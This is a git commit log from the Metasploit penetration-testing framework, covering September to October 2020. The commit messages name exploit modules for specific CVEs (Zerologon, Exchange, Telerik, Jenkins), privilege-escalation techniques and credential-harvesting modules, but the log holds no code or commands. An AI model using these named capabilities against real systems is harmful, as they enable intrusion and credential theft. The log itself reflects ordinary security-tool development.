Spencer McIntyre ec63373ff7 Merge branch 'feat/dll-mixed-mode' into feat/cve-2019-18935 2020-10-05 16:42:24 -04:00
Spencer McIntyre 4e2093d860 Initial Telerik UI RAU module 2020-10-05 16:42:05 -04:00
Spencer McIntyre f77bdcd855 Add the mixed_mode option when generating DLL EXEs 2020-10-05 15:49:06 -04:00
Spencer McIntyre d6e1eee635 Add a new Mixed Mode Assembly DLL payload template 2020-10-05 15:19:40 -04:00
Pedro Ribeiro 4657cb6c4a remove EOL spaces 2020-10-06 00:33:28 +07:00
bwatters 3a6293357e Land #14190, Add the DOMAIN option to the CVE-2020-0688 Exploit
Merge branch 'land-14190' into upstream-master
2020-10-05 12:12:21 -05:00
Pedro Ribeiro c405495391 remove begin and add checkcode unknown 2020-10-05 23:44:10 +07:00
Pedro Ribeiro 850c58e902 Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-05 23:36:59 +07:00
Pedro Ribeiro bbe80cadd3 Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-05 23:36:37 +07:00
Pedro Ribeiro 7d17ae6a61 Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-05 23:35:27 +07:00
JRodriguez556 a1164dbe9e Update php_fpm_rce.rb
URI.encode/URI.escape is obsolete. Replaced with CGI.escape.
2020-10-05 11:57:17 -04:00
bwatters 83bd9bc3e4 Land #14220, fix vulnerability spelling
Merge branch 'land-14220' into upstream-master
2020-10-05 08:14:37 -05:00
h00die 15bb690308 fix vulnerability spelling 2020-10-04 13:00:48 -04:00
h00die 3999fe3517 add . to md5 charset 2020-10-04 12:54:08 -04:00
adfoster-r7 7be36a772d Land #14215, updates Dockerfile for bundler 2 support 2020-10-02 22:46:21 +01:00
Jeffrey Martin 32a9719543 bump final container to use Ruby 2.6.6 2020-10-02 16:02:59 -05:00
Jeffrey Martin 9905f6ede6 update rubygems and bundler in final container 2020-10-02 15:52:02 -05:00
Alan Foster 30809787c4 Convert disclosure dates to iso8601 2020-10-02 21:00:37 +01:00
Alan Foster c4c551fdef Add disclosure date rubocop linting rule 2020-10-02 21:00:32 +01:00
Jeffrey Martin f8abaee104 updates Dockerfile for bundler 2 support 2020-10-02 14:06:55 -05:00
Jeffrey Martin 7d330da7b2 Land #14214, Roll back Travis testing to 2.7.1 2020-10-02 14:04:54 -05:00
Adam Cammack f13cd0e91c Roll back Travis testing to 2.7.1 2020-10-02 12:04:22 -05:00
Adam Cammack d612962ef4 Land #14197, start testing on Ruby 2.7 2020-10-02 11:26:20 -05:00
Adam Cammack 919e5212e7 Update 2.7 tests to 2.7.2 2020-10-02 11:25:24 -05:00
Metasploit c008edd200 automatic module_metadata_base.json update 2020-10-02 10:07:48 -05:00
Grant Willcox 640a9e2021 Land #14212, Fix invalid disclosure date formats in some modules 2020-10-02 09:55:47 -05:00
Alan Foster 26ff912291 Fix invalid disclosure date formats 2020-10-02 12:20:05 +01:00
youkergav 809584da68 Fixed bug that was crashing orignal session 2020-10-02 04:00:40 -04:00
Jeffrey Martin 66f04a95b7 better enforcement of binary mode on test fixtures 2020-10-01 14:29:10 -05:00
kalba-security 997fc4c7cc Use split without specifying newlines 2020-10-01 14:31:16 -04:00
Metasploit 1b9b1c5a92 Bump version of framework to 6.0.10 2020-10-01 12:22:38 -05:00
adfoster-r7 4616e62543 Land #14211, re-introduce unintentionally deleted support for finding a service by id. 2020-10-01 17:52:23 +01:00
Jeffrey Martin 03a30d80ef creds need web service to support request by :id 2020-10-01 11:13:38 -05:00
Metasploit 49d5d2abf8 automatic module_metadata_base.json update 2020-10-01 10:18:53 -05:00
Grant Willcox f45d9b295a Land #14204, Update the module docs for CVE-2020-1472 (Zerologon) 2020-10-01 10:09:19 -05:00
Metasploit 0ed3a65f3c automatic module_metadata_base.json update 2020-10-01 09:59:34 -05:00
bwatters e24a81919a Land #13996, Add module for CVE-2020-9801, CVE-2020-9850 and CVE-2020-9856,
RCE for Safari on macOS 10.15.3 (pwn2own2020)

Merge branch 'land-13996' into upstream-master
2020-10-01 09:46:39 -05:00
Spencer McIntyre bf13ffc692 Update documentation based on feedback 2020-10-01 09:19:15 -04:00
Pedro Ribeiro 2353b3fdaf Add rockwell sploit 2020-10-01 11:03:50 +07:00
Pedro Ribeiro 83ae2334c8 Merge pull request #23 from rapid7/master
aaaa
2020-10-01 11:02:54 +07:00
Pedro Ribeiro 74ac85e5d3 revert previous mistake 2020-10-01 10:59:11 +07:00
Grant Willcox 4747b7c676 Land #14129, Add Impacket and associated dependencies into Dockerfile 2020-09-30 17:22:26 -05:00
James Lee 80b94334f2 ghetto force java 2020-09-30 16:58:12 -05:00
Spencer McIntyre 377c019d99 Update the module docs for CVE-2020-1472 2020-09-30 17:41:14 -04:00
Grant Willcox a2e6b96c43 Land #14203, Fix report_note ActiveRecord::StatementInvalid PG::InvalidTextRepresentation exception 2020-09-30 16:12:22 -05:00
Grant Willcox b0f96fd755 Land #14200, Fix whitespace issue in OpenVAS importer that was breaking some imports 2020-09-30 14:02:28 -05:00
Spencer McIntyre 69f0234e48 Use #address as the host address instead of the MDM object 2020-09-30 14:28:09 -04:00
Metasploit 235993dd4c automatic module_metadata_base.json update 2020-09-30 13:27:52 -05:00
Grant Willcox fb73be7e35 Land #14199, Fix SecureCRT missing registry key bug 2020-09-30 13:17:06 -05:00
Grant Willcox b0bad9fc85 Fix up small issue with one of the checks and update the documentation with the new SESSION_PATH option 2020-09-30 12:26:32 -05:00
Metasploit 665d011116 automatic module_metadata_base.json update 2020-09-30 10:58:14 -05:00
Spencer McIntyre c0b42ff7a2 Land #13995, Add a Windows Secrets Dump module 2020-09-30 11:47:59 -04:00
Grant Willcox 5986bc98f1 Land #14171, Replace erroneous calls to get_service with calls to service 2020-09-30 10:05:13 -05:00
Christophe De La Fuente 94796f5c91 Updates from review #2 2020-09-30 15:01:54 +02:00
Christophe De La Fuente bcc45e5183 Land #1, updates from @smcintyre-r7 2020-09-30 14:39:51 +02:00
kalba-security 26f113d154 Fix help message for the favorite command 2020-09-30 08:36:44 -04:00
Christophe De La Fuente 8795a1afc9 Revert "Updates from review" to include @smcintyre-r7 changes first
This reverts commit 0d9e0636b3.
2020-09-30 13:33:32 +02:00
Christophe De La Fuente 0d9e0636b3 Updates from review 2020-09-30 13:18:49 +02:00
Alan Foster 33fbd52d8b Fix port parsing error when importing openvas 2020-09-30 09:51:30 +01:00
cn-kali-team 9d29c33882 Merge branch 'origin/Gather_Securecrt_Password' of github.com:cn-kali-team/metasploit-framework into origin/Gather_Securecrt_Password
Check that the folder does not exist
2020-09-30 07:40:44 +08:00
cn-kali-team dce8bdc19a Check that the folder does not exist 2020-09-30 07:39:33 +08:00
kalba-security 5d99eda74b Add and command 2020-09-29 18:35:08 -04:00
Spencer McIntyre 16dd4fbb6f Use nil for default registry values instead of 'default' 2020-09-29 16:50:38 -04:00
Spencer McIntyre d53da9a83a Always show the plain password value of the machine account 2020-09-29 16:17:02 -04:00
Spencer McIntyre d91a9a0468 Consolidate the aes_cts_hmac_sha1_96_key functions 2020-09-29 16:05:06 -04:00
Metasploit 29732b9fc5 automatic module_metadata_base.json update 2020-09-29 13:51:17 -05:00
bwatters 3aeeede4a6 Land #14187, Added CVE-2020-3433 module
Merge branch 'land-14187' into upstream-master
2020-09-29 13:41:33 -05:00
bwatters 81fd2ea8a8 rubocop changes 2020-09-29 13:38:31 -05:00
Christophe De La Fuente 67821e32c4 Password cracking integration 2020-09-29 20:36:39 +02:00
Jeffrey Martin 2b223798c7 no longer restrict rubygems version 2020-09-29 09:47:58 -05:00
Jeffrey Martin dceaf1d47c force res and expected encoding in smb tests 2020-09-29 08:57:20 -05:00
bwatters d9b121b50d Land #14177, Reserve space for the encoder when generating payloads
Merge branch 'land-14177' into upstream-master
2020-09-29 08:02:55 -05:00
adfoster-r7 0785e535aa Land #14183, update the debug command to additionally extract the web server logs 2020-09-29 12:48:55 +01:00
youkergav 0bceead907 Merge branch 'master' of github.com:rapid7/metasploit-framework into su_login 2020-09-29 01:53:50 -04:00
youkergav 9cf07e499f Replaced payload encoding function 2020-09-29 01:49:40 -04:00
C4ssandre 37dffaf703 Removing old ReflectiveLoader source files and linking to metasploit-framework embedded ones. 2020-09-29 00:19:09 +00:00
C4ssandre 03b7c00fce Replacing a malloc by a calloc for more reliability. 2020-09-29 00:07:37 +00:00
C4ssandre cbb07ec208 Replacing old base64 encoding and decoding "homemade" function by wincrypt.h functions (CryptBinaryToStringA and CryptStringToBinaryA). Adding some little adjustments in calling functions of elevator server. 2020-09-29 00:05:49 +00:00
C4ssandre de5390a4a7 Fixing typo. Not important. 2020-09-28 23:41:45 +00:00
C4ssandre 695e541682 Fixing unused result of DuplicateTokenEx() function. Now, the returned error code is used for monitoring the calling function process. 2020-09-28 23:41:19 +00:00
C4ssandre d4c1f65e99 Fixing typo in description comments of function IsTokenSystem(). 2020-09-28 23:25:08 +00:00
bwatters 9416b9ead4 Land #14030, New GetSystem Technique: Named Pipe Impersonation (RPCSS Variant)
Merge branch 'land-14030' into upstream-master
2020-09-28 18:24:44 -05:00
C4ssandre e533626aa0 Fixing non-use of error codes in function IsTokenSystem(). Now error codes are controlled and if token does not belong to SYSTEM, RunRogueWinRM returns the proper error code. 2020-09-28 23:23:49 +00:00
C4ssandre a2ef556cd8 Fixing redundant ZeroMemory instruction. 2020-09-28 23:17:06 +00:00
C4ssandre 234ddd2c1c Fixing typo in HEAP_ALLOC_FAILURE constant name. 2020-09-28 23:13:47 +00:00
C4ssandre 494e3d113e Adding new and more granular error codes. 2020-09-28 23:10:46 +00:00
bwatters 6fd25de569 bump payloads gem to pull in payloads PR changes 2020-09-28 16:45:14 -05:00
Grant Willcox 1a598b747d Land #14186, Add missing payload tests to rake spec file 2020-09-28 12:45:45 -05:00
adfoster-r7 dcf10c7ed6 Land #14178, update Gemfile.local.example to showcase locally checked out dependencies 2020-09-28 17:53:07 +01:00
Christophe De La Fuente 9cb419ae8c Resync with master branch 2020-09-28 15:45:02 +02:00
Spencer McIntyre e7d2b73600 Add a DOMAIN option to CVE-2020-0688 for consistency with other modules 2020-09-28 09:24:39 -04:00
Metasploit d49f3756ff automatic module_metadata_base.json update 2020-09-28 06:12:12 -05:00
Christophe De La Fuente 59fff3d7fe Land #14161, VyOS config processor 2020-09-28 13:02:19 +02:00
h00die 362ba1b235 more reviews 2020-09-27 08:17:32 -04:00
youkergav 38fb644169 Architecture updates; base64 password; compliance 2020-09-25 23:58:48 -04:00
Metasploit e6a741011f automatic module_metadata_base.json update 2020-09-25 16:17:49 -05:00
Jeffrey Martin 894ce6b72b ignore cache size for peinject stage 2020-09-25 16:12:44 -05:00
Shelby Pace f0f4da2b1e Land #14157, Windows update orchestrator privesc 2020-09-25 16:07:27 -05:00
Antoine GOICHOT fef88f27eb Added CVE-2020-3433 module 2020-09-25 23:04:58 +02:00
Shelby Pace 2111865acf remove stray backtick 2020-09-25 16:04:46 -05:00
h00die 2c9e2f79d9 optional user level 2020-09-25 15:48:31 -04:00
Metasploit 09e660faa6 automatic module_metadata_base.json update 2020-09-25 13:36:20 -05:00
Christophe De La Fuente 7bfc47f08a Land #14175, MaraCMS 7.5 Arbitrary File Upload (CVE-2020-25042) 2020-09-25 20:24:55 +02:00
bwatters 2ed72007e0 Typos and cleanup 2020-09-25 12:27:55 -05:00
Adam Galway bccc17e4ae updates tests to consider msf-ws.log 2020-09-25 14:45:33 +01:00
Jeffrey Martin b790d697ac add missing peinject stage payloads 2020-09-25 08:23:08 -05:00
Adam Galway 5100767985 change msf-ws.log log line total to 150 2020-09-25 13:11:24 +01:00
kalba-security 33b3d6efcc Use register_for_cleanup instead of on_new_session for cleanup 2020-09-25 08:11:02 -04:00
Adam Galway b23b7d8e5c includes contents of msf-ws.log in debug -e 2020-09-25 13:04:50 +01:00
Adam Galway e0e8ac3b7c includes contents of msf-ws.log in debug -l 2020-09-25 13:00:59 +01:00
youkergav d45dfe865a Check noexec mount for payload; Coding comliance 2020-09-25 04:01:39 -04:00
Metasploit 37dfc79547 automatic module_metadata_base.json update 2020-09-25 00:29:08 -05:00
Tim W bb04041c93 Land #14172, Fix #14170, Add option to disable autorun in persistence_exe 2020-09-25 13:16:51 +08:00
Tim W 77b7cf4f65 make RUN_NOW a non-advanced option 2020-09-25 13:15:34 +08:00
Tim W 72111a9677 don't start service unless RUN_NOW is true 2020-09-25 13:15:30 +08:00
youkergav 17483f838e Bug fixes per requests 2020-09-25 00:01:52 -04:00
kalba-security 5b48bae4b0 Use keep_cookies instead of @cookie variable 2020-09-24 16:36:01 -04:00
Metasploit ebf8a84b68 Bump version of framework to 6.0.9 2020-09-24 12:04:04 -05:00
Shelby Pace 6c76442639 Land #14153, display SRVHOST SRVPORT opts w/auto 2020-09-24 11:12:08 -05:00
Grant Willcox 94c34200f1 Add in fix to use relative paths for Gemfile.local.example, thereby fixing review comments 2020-09-24 09:25:03 -05:00
Alan Foster 8bc80c26c1 Remove unused constant references, and add session new command id 2020-09-24 15:00:17 +01:00
kalba-security 45d13bf85e Simplify shash checks, use cgi request instead of raw, fix ctype header placement 2020-09-24 07:49:55 -04:00
youkergav 49a5dfc139 Spelling and grammer fixes 2020-09-24 03:29:07 -04:00
youkergav 35dd9cb517 Add Login to User with Su on Linux / Unix Systems 2020-09-24 02:36:26 -04:00
Metasploit 8a46b2b125 automatic module_metadata_base.json update 2020-09-23 18:54:28 -05:00
Shelby Pace 2f083b03dd Land #14140, add software enumeration module 2020-09-23 18:43:28 -05:00
Shelby Pace 1b66f4a9de include Android::Priv mixin 2020-09-23 18:42:07 -05:00
Grant Willcox a30c0a1150 Update the Gemfile.local.example file with an example of how to use the path option to reference local files. 2020-09-23 17:37:14 -05:00
Metasploit c3ebe87196 automatic module_metadata_base.json update 2020-09-23 17:09:02 -05:00
Spencer McIntyre 358f44f259 Land #14035, Fix is_known_pipename module 2020-09-23 17:58:34 -04:00
Spencer McIntyre 9e5ef4b782 Bump ruby_smb gem version to 2.0.6 in Gemfile.lock 2020-09-23 17:58:16 -04:00
Spencer McIntyre aa1e4dbf5c Only propagate space information when it's set 2020-09-23 16:21:12 -04:00
kalba-security e026c74108 Improve Failure:: categories and remove empty parameters from POST requests 2020-09-23 13:27:19 -04:00
Grant Willcox 35fec19faa Fix Android code so that if we have root permissions we use dumpsys to get the package versions, otherwise just enumerate the installed software, but not the versions as we did before, but this time print out a warning. 2020-09-23 12:05:04 -05:00
Grant Willcox 8951b2a0d2 Add additional support for two other common MacOS package managers, HomeBrew and MacPorts 2020-09-23 11:46:08 -05:00
h00die 92e41b2678 review comments 2020-09-23 10:36:26 -04:00
Spencer McIntyre 61f5879b2f Reserve some space when a payload needs to be encoded 2020-09-23 10:26:13 -04:00
Christophe De La Fuente 0cc1ad10ed Land #14176', Show correct rank for show exploits command 2020-09-23 15:30:08 +02:00
kalba-security 1133f76722 Improve feedback when authentication fails 2020-09-23 07:51:11 -04:00
Alan Foster 94fcd808fb Show correct rank for show exploits command 2020-09-23 11:34:46 +01:00
ingroxd 62481f0159 Changed DisableExec with RUN_NOW for consistency 2020-09-23 09:12:31 +00:00
Christophe De La Fuente 7c575223a2 Sync with master 2020-09-23 10:08:07 +02:00
Metasploit f6d8cc01fa automatic module_metadata_base.json update 2020-09-22 17:19:54 -05:00
Grant Willcox 1710b98ba4 Land #14173, Unify the socks modules using a VERSION option 2020-09-22 17:09:34 -05:00
Grant Willcox 6d78a54e61 Update the documentation to include the output of 'show options' so people can see what options we are running it with, and so it uses MSF6 prompts 2020-09-22 17:08:56 -05:00
kalba-security e65083c092 Add maracms_upload_exec.rb exploit module and docs 2020-09-22 16:53:29 -04:00
Metasploit d3ed1e3e98 automatic module_metadata_base.json update 2020-09-22 15:52:49 -05:00
Grant Willcox 13bf1b7711 Land #14118, SecureCRT Session Credential Grabber, try 2 2020-09-22 15:38:25 -05:00
Metasploit f0b85c9f73 automatic module_metadata_base.json update 2020-09-22 15:28:17 -05:00
Grant Willcox a96827a823 Land #14118, SecureCRT Session Credential Grabber 2020-09-22 15:17:04 -05:00
Grant Willcox 02320dd76f Apply tidying fixes to the documentation to make it msftidy_docs.rb compatible. 2020-09-22 14:54:33 -05:00
Grant Willcox b9fa36c89b Add in option to decrypt Login Script V3 within session files and also update some of the existing regex to fix some minor mistakes 2020-09-22 14:47:28 -05:00
Metasploit a0984ae911 automatic module_metadata_base.json update 2020-09-22 14:37:57 -05:00
William Vu f74eba731e Land #14151, Zerologon (CVE-2020-1472) module 2020-09-22 14:02:23 -05:00
William Vu 49371ef119 Bump ruby_smb gem version to 2.0.5 in Gemfile.lock 2020-09-22 14:02:09 -05:00
Spencer McIntyre a14780d024 Update the zerologon options for clarity 2020-09-22 14:57:57 -04:00
bwatters 6cf3c0491f Add documentation 2020-09-22 12:16:29 -05:00
Spencer McIntyre a67379d1e1 Fix rubocop complaints 2020-09-22 10:28:58 -04:00
Spencer McIntyre 77f0d90bf0 Unify the socks modules using a VERSION option 2020-09-22 10:16:00 -04:00
bwatters 7e68c42876 Rubocop, fix check method, clean up c code 2020-09-22 07:45:02 -05:00
ingroxd e6978d7ef9 Added option to spik execution 2020-09-22 12:21:27 +00:00
Adam Galway 571504642a fixes get_service calls 2020-09-22 12:54:58 +01:00
Adam Galway a0d6431ed5 adds protocol to search terms 2020-09-22 12:44:32 +01:00
Metasploit ab348ecafc automatic module_metadata_base.json update 2020-09-22 05:43:28 -05:00
Christophe De La Fuente 2d1b378a18 Land #14122, Jenkins Deserialization RCE (CVE-2017-1000353) 2020-09-22 12:32:09 +02:00
h00die 5eb2884c7e fix tests 2020-09-21 19:35:46 -04:00
Metasploit 0752602890 automatic module_metadata_base.json update 2020-09-21 15:38:44 -05:00
Shelby Pace 2ae50e9304 Land #14025, add Artica Proxy auth bypass / rce 2020-09-21 15:27:53 -05:00
Shelby Pace 18fa28f96b change date format / default payload 2020-09-21 15:26:39 -05:00
Grant Willcox 67d43bcc15 Add in RuboCop fixes 2020-09-21 13:49:05 -05:00
Grant Willcox 9b1fec069f Add in final touch up fixes to make sure that securecrt_store_config checks its input correctly, and to fix up some further mistakes found whilst reviewing the code for nil errors that could be fixed 2020-09-21 13:15:03 -05:00
Grant Willcox ba76eabc72 Fix potential nil error with filling in the protocol field in enum_session_file 2020-09-21 12:23:23 -05:00
Grant Willcox 966ae4a6a3 Fix up the logic for calling securecrt_store_config 2020-09-21 12:10:12 -05:00
Spencer McIntyre 3ae4eb3dce Convert the BinData error_status value to a Ruby integer 2020-09-21 11:38:33 -04:00
h00die 610d4d86d2 initial vyos implementation 2020-09-20 19:48:20 -04:00
Metasploit 21d9f06373 automatic module_metadata_base.json update 2020-09-19 08:26:48 -05:00
h00die ee77cc8e78 Land #14123, vyos restricted shell escape and priv escalation 2020-09-19 09:13:38 -04:00
cn-kali-team dadd0fef89 Simplify the code 2020-09-19 10:09:42 +08:00
bwatters 534e945cd0 First attempt at CVE-2020-1313 2020-09-18 15:39:12 -05:00
Spencer McIntyre a810d37c47 Move the NetrServerPasswordSet2 DCERPC data defs into RubySMB 2020-09-18 16:19:23 -04:00
Jeffrey Martin 0585553100 Land #14155, Revert "Replaces erroneous calls to get_service" 2020-09-18 14:08:24 -05:00
Spencer McIntyre fdedcfa600 Updates to use the latest proposed RubySMB changes 2020-09-18 14:27:14 -04:00
adfoster-r7 9ef5822d3a Revert "Replaces erroneous calls to get_service" 2020-09-18 19:09:25 +01:00
Brendan Coles 6208f8795a vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00
Grant Willcox f6b032b744 Add warning about Linux results to documentation and to the module's description field 2020-09-18 10:35:59 -05:00
Metasploit 93290e1fa6 automatic module_metadata_base.json update 2020-09-18 09:58:24 -05:00
Shelby Pace 74669f4052 Land #14135, add tp-link command injection 2020-09-18 09:47:02 -05:00
Shelby Pace f4bfad0439 msftidy_docs changes 2020-09-18 09:42:14 -05:00
Pietro Oliva 5f204257a5 Remove unnecessary comma, fix docs 2020-09-18 10:15:23 -04:00
Pietro Oliva e2c169d7d3 Remove unnecessarily setting SSL via datastore 2020-09-18 09:32:45 -04:00
0xsysenter 3144a1aede Add SSL in DefaultOptions
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-18 15:31:23 +02:00
Pietro Oliva d3f68d0fe4 Fix double shell issue 2020-09-18 09:23:02 -04:00
Christophe De La Fuente 673a5303c5 Add auto to server_conditions
`show options` command will now display SRVHOST and SRVPORT options,
even if `auto` is selected in `CMDSTAGER::FLAVOR`
2020-09-18 10:26:50 +02:00
Grant Willcox de4008984a Add in a few more package managers, think I'll stop after this given the diminishing returns atm 2020-09-17 18:00:36 -05:00
Grant Willcox 02bf9561e5 Switch over to using a packager manager orientated approach for gathering installed software on Linux 2020-09-17 17:18:29 -05:00
Spencer McIntyre 996598bfc8 Use a proper constant and specify null values for forward compatibility 2020-09-17 18:07:41 -04:00
Metasploit 9442012abb automatic module_metadata_base.json update 2020-09-17 16:18:07 -05:00
Grant Willcox 83a8f87438 Fix some mistakes with the command for some package managers that weren't returning the version numbers as expected 2020-09-17 16:08:35 -05:00
Shelby Pace c04e8d73c3 Land #14023, spooler svc privesc (PrinterDemon) 2020-09-17 16:06:29 -05:00
Shelby Pace 8b75401fcf remove requires 2020-09-17 16:04:56 -05:00
Shelby Pace 510d119579 add steps for producing serialized object 2020-09-17 13:58:48 -05:00
Spencer McIntyre b794c88433 Implement a check method for the vulnerability 2020-09-17 14:37:36 -04:00
Spencer McIntyre 27b6c8a55b Add module docs and apply rubocop fixes to the module 2020-09-17 14:28:53 -04:00
Shelby Pace 09c5b906af change notes and primary command stager flavor 2020-09-17 13:25:14 -05:00
Spencer McIntyre 0b61092fe5 Add module data, use fail_with and rename an option for consistency 2020-09-17 13:35:30 -04:00
Metasploit 3c4e528d3b Bump version of framework to 6.0.8 2020-09-17 12:02:42 -05:00
Spencer McIntyre 7e1e1f593f Refactor the code and support restoring the machine password 2020-09-17 12:49:56 -04:00
Metasploit 3e00adf61c automatic module_metadata_base.json update 2020-09-17 11:03:21 -05:00
Christophe De La Fuente 7323447c0a Land #14117', Hyper-V VM Enumeration Module 2020-09-17 17:52:27 +02:00
Grant Willcox a5c30be10b Land #14143, Replace erroneous calls to get_service 2020-09-17 10:41:15 -05:00
Grant Willcox b9ead300a8 Land #14145, Fix base64 error with the web service when storing a file into MSF's loot 2020-09-17 09:46:22 -05:00
Shelby Pace 8c1968e01c use more generic regex for versioning
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-09-17 09:12:20 -05:00
Shelby Pace f5f010a1b0 Update documentation/modules/exploit/linux/http/jenkins_cli_deserialization.md
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-09-17 09:11:43 -05:00
Spencer McIntyre 58033cbaa2 Cleanup the code for CVE-2020-1472 2020-09-17 09:50:35 -04:00
Adam Galway 9a75fa681a removes undeeded id insertion into URL 2020-09-17 14:19:10 +01:00
Pietro Oliva 072f35c270 -Updated module to work using CmdStager
-Updated documentation accordingly
-Removed unnecessary includes and simplified code
2020-09-16 19:51:15 -04:00
Grant Willcox ef2ed891d4 Land #14146, Fix typo in YARD documentation for rpc_session.rb 2020-09-16 16:10:39 -05:00
Grant Willcox 85ef2b602e Fix up regex in module to address changes noted in review. Also update documentation to remove an extra line and to address review recommendtations 2020-09-16 16:02:54 -05:00
Metasploit e7628d0c24 automatic module_metadata_base.json update 2020-09-16 15:41:14 -05:00
Spencer McIntyre c2d101a06b Land #14126, Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875) 2020-09-16 16:31:13 -04:00
Spencer McIntyre f407da63e8 Initial check for CVE-2020-1472 complete 2020-09-16 16:15:19 -04:00
Grant Willcox bc9986f72c Apply RuboCop edits and also edit the %w[] entries so they didn't include the stray single quotes in the resulting string 2020-09-16 15:14:52 -05:00
Grant Willcox 798e5cce61 Add in casting the results of cmd_exec calls to strings using .to_s as @bcoles recommended and also check for potential cases where no results are returned. This should make the code more defensive and help protect against potential failure cases 2020-09-16 15:06:11 -05:00
Spencer McIntyre 4c1ce8834e Land #14139, Add cookie management to HttpClient and improve standards compliance 2020-09-16 16:02:29 -04:00
William Vu 5bda3b4b9d Revert "Make User-Agent consistent across requests"
This reverts commit 0ec97aa447.
2020-09-16 13:24:18 -05:00
William Vu da4e960eb0 Revert "Fix HttpUserAgent to UserAgent"
This reverts commit 3c8390a1c7.
2020-09-16 13:24:14 -05:00
William Vu 3c8390a1c7 Fix HttpUserAgent to UserAgent
Payload vs. HttpClient. Whoops.
2020-09-16 13:03:55 -05:00
William Vu 0ec97aa447 Make User-Agent consistent across requests 2020-09-16 12:59:17 -05:00
William Vu 03e0b9098c Add more words about Exchange role groups 2020-09-16 12:55:08 -05:00
Grant Willcox 3e10ec5fc9 Redo the checks using the command_exists? command that @bcoles recommended 2020-09-16 12:49:36 -05:00
Pietro Oliva c396ad0436 Fix compatibility issue resulting in no shell on some devices 2020-09-16 13:38:34 -04:00
William Vu 3508ba23d9 Don't expose HttpClient dev options to the user
HttpKeepCookies and HttpPartialResponses have been removed.
2020-09-16 12:26:11 -05:00
Grant Willcox e3ffa39e57 Implement the case change from the review as mentioned by @wvu-r7 2020-09-16 12:15:40 -05:00
Grant Willcox 4f0f63e3ea Silly edit to fix an extra space. Feel free to merge me with the last commit. 2020-09-16 11:57:59 -05:00
bwatters 06f5518953 Update binaries 2020-09-16 11:41:02 -05:00
Grant Willcox 1795edfa29 Fix up enum_software_versions.rb and its code based on initial feedback 2020-09-16 11:40:37 -05:00
bwatters d8df8a3422 Change description and fix typo 2020-09-16 11:17:39 -05:00
bwatters a2edcda819 Rubocop on module and update error handling on exploit C code + recompile 2020-09-16 11:17:39 -05:00
bwatters 95bb6ad71a Add new binaries 2020-09-16 11:17:39 -05:00
bwatters a5253c5674 remove old binaries before we added both x86 and x64 binaries 2020-09-16 11:17:39 -05:00
bwatters dcd0918694 Fixed cleanup and check 2020-09-16 11:17:39 -05:00
bwatters 198f3905ae Logic errors and typos 2020-09-16 11:17:39 -05:00
bwatters fe59099678 Clean up C code, add support for x86 targets 2020-09-16 11:17:39 -05:00
bwatters ce8033714d remove copy/pasta code and fix version check 2020-09-16 11:17:39 -05:00
bwatters c2e2a4fe2c More Rubocop, add documentation, and typo fix 2020-09-16 11:17:39 -05:00
bwatters f14d6ffe13 Rubocop and modularization 2020-09-16 11:17:39 -05:00
bwatters a72769909b Change exe to take destination and source files for copy 2020-09-16 11:17:39 -05:00
bwatters 17272209cc First try at CVE-2020-1048, needs lots of work 2020-09-16 11:17:38 -05:00
Metasploit 1255c4a059 automatic module_metadata_base.json update 2020-09-16 10:35:56 -05:00
Shelby Pace 0f0d6a233b Land #14074, add Mida eFramework command injection 2020-09-16 10:24:51 -05:00
The Zero Day Initiative Team eb49949639 simple typo fix in comment (in the YARD)
changes # ...actioin to action
2020-09-16 10:18:03 -05:00
Adam Galway 24d1d37a93 Land #14120, services -S stays in correct wrkspace 2020-09-16 15:54:22 +01:00
Christophe De La Fuente 3728df544e base64-encode data for string and array 2020-09-16 16:49:44 +02:00
Adam Galway 14b233f957 fixes broken tests 2020-09-16 15:20:16 +01:00
Adam Galway 4918ecf826 replaced get_service calls with services calls 2020-09-16 12:29:15 +01:00
William Vu e118ff1509 Add Microsoft Exchange Server DLP Policy RCE
CVE-2020-16875
2020-09-16 02:41:08 -05:00
Tim W 08fbce5220 Land #14125, add SCREEN_EFFECTS note to tccbypass 2020-09-16 15:14:29 +08:00
William Vu a946bdb67c Add cookie management to HttpClient 2020-09-16 00:13:26 -05:00
Grant Willcox 30b8fd4d4a Upload initial documentation 2020-09-15 17:39:12 -05:00
Grant Willcox 2544b1a4cc Add RuboCop fixes to the module and also update the Android code to be correct 2020-09-15 17:16:11 -05:00
Grant Willcox 3d883cd5e5 Merge me with last commit, remove erronious extra require 2020-09-15 16:59:28 -05:00
Grant Willcox 96a0fca456 Initial upload of enum_software_versions.rb 2020-09-15 16:27:22 -05:00
William Vu 6e64d74a56 Fix send_request_cgi! behavior to use PRG pattern 2020-09-15 15:50:57 -05:00
William Vu cada3cdf52 Fix ArgumentError in res.redirection from URI(nil) 2020-09-15 15:50:17 -05:00
William Vu 53fd5c9d14 Fix GET ctype=application/x-www-form-urlencoded 2020-09-15 15:50:07 -05:00
0xsysenter b0f329a238 Update documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
improved documentation

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-15 21:00:06 +02:00
0xsysenter a987065eae Update documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
improved documentation

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-15 20:59:31 +02:00
William Vu 1ce860a371 Land #14138, nexus_repo_manager_el_injection fix
Just the doc.
2020-09-15 13:24:10 -05:00
William Vu 5ba3301d16 Fix nexus_repo_manager_el_injection.md scenario
Missed in 966194d2b7.
2020-09-15 13:14:36 -05:00
Pietro Oliva 19d8527275 Added module documentation 2020-09-15 12:32:27 -04:00
Pietro Oliva c6b6021df3 Tidy up code with rubocop and msftidy 2020-09-14 21:13:09 -04:00
Pietro Oliva 963a4d29ec Removed unnecessary "begin, end" 2020-09-14 19:53:18 -04:00
Niboucha Redouane 3a09337935 Remove AUTH_BYPASS target 2020-09-15 01:51:34 +02:00
